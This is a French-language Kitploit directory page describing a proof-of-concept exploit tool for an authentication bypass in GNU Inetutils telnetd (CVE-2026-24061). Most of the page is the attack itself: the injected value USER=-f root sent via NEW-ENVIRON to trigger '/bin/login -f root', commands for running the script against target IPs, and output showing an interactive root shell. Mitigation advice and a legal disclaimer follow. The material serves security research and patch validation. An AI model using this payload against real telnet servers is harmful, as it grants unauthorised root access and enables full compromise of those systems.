Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — Preuve de concept d'exploitation pour le contournement d'authentification de GNU Inetutils telnetd (CVE-2026-24061) qui ouvre un shell root via une variable USER NEW-ENVIRON spécialement conçue. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationOutil d'Accès à Distance
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

Preuve de concept d'exploitation pour le contournement d'authentification de GNU Inetutils telnetd (CVE-2026-24061) qui ouvre un shell root via une variable USER NEW-ENVIRON spécialement conçue.

Voir le dépôt
6il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Vue d'ensemble

Ce dépôt contient un exploit Proof‑of‑Concept pour la vulnérabilité de contournement d'authentification à distance de GNU Inetutils telnetd.

Le problème vient du fait que telnetd ne nettoie pas correctement la variable d'environnement USER reçue via la négociation Telnet NEW‑ENVIRON avant d'invoquer /bin/login.

En fournissant :

root@kitploit:~
USER=-f root

telnetd exécute effectivement :

root@kitploit:~
/bin/login -f root

ce qui contourne l'authentification et ouvre immédiatement un shell root.

  • Produit : GNU Inetutils telnetd
  • Versions affectées : ≤ 2.7
  • Port : 23/TCP
  • Authentification : Non requise
  • Impact : Contournement d'authentification → Shell root
  • Privilèges : root
  • CVE : CVE‑2026‑24061
  • CVSS : 9.8 (Critique)

⚙️ Détails techniques

Telnet NEW‑ENVIRON permet aux clients de définir des variables d'environnement pendant la négociation de session.

Le telnetd vulnérable transmet USER directement à login :

root@kitploit:~
/bin/login -f "$USER"

Un attaquant définit :

root@kitploit:~
USER=-f root

Résultat :

root@kitploit:~
/bin/login -f root

Le drapeau -f indique à login de sauter l'authentification, accordant un accès root.


📦 Prérequis

  • Python 3
  • telnetlib (bibliothèque standard)
  • Cible exécutant inetutils‑telnetd vulnérable ≤ 2.7
  • Service Telnet accessible sur TCP/23

Aucune dépendance externe requise.


🚀 Utilisation

1️⃣ Exécuter l'exploit

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ Port optionnel

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ Résultat attendu

Si vulnérable :

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

Vous disposez maintenant d'un shell root interactif.


🧪 Exemple

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

Sortie :

root@kitploit:~
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#

🧯 Remarques

  • L'exploit est instantané
  • Aucune force brute requise
  • Aucun identifiant requis
  • Exploitation observée dans la nature
  • Fonctionne sur les installations par défaut de inetutils‑telnetd Debian/Ubuntu
  • Échoue si telnetd est corrigé ou remplacé (par ex., OpenBSD telnetd)

🛡️ Atténuation

  • Mettre à niveau GNU Inetutils ≥ 2.8
  • Désactiver le service telnet
  • Remplacer par SSH
  • Bloquer TCP/23 au pare-feu
  • Auditer les paquets inetutils‑telnetd

📊 Flux d'attaque du PoC

root@kitploit:~
sequenceDiagram
    participant A as Attaquant
    participant T as telnetd cible
    participant L as /bin/login
    participant R as Shell root

    A->>T: Connexion TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Exécuter /bin/login -f root
    L-->>T: Contournement d'authentification réussi
    T-->>R: Ouvrir un shell root
    R-->>A: Session root interactive

⚠️ Avertissement

Cet exploit est fourni pour :

  • La recherche en sécurité
  • Les tests d'intrusion autorisés
  • La validation défensive

Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester est illégale.

Télécharger l’outil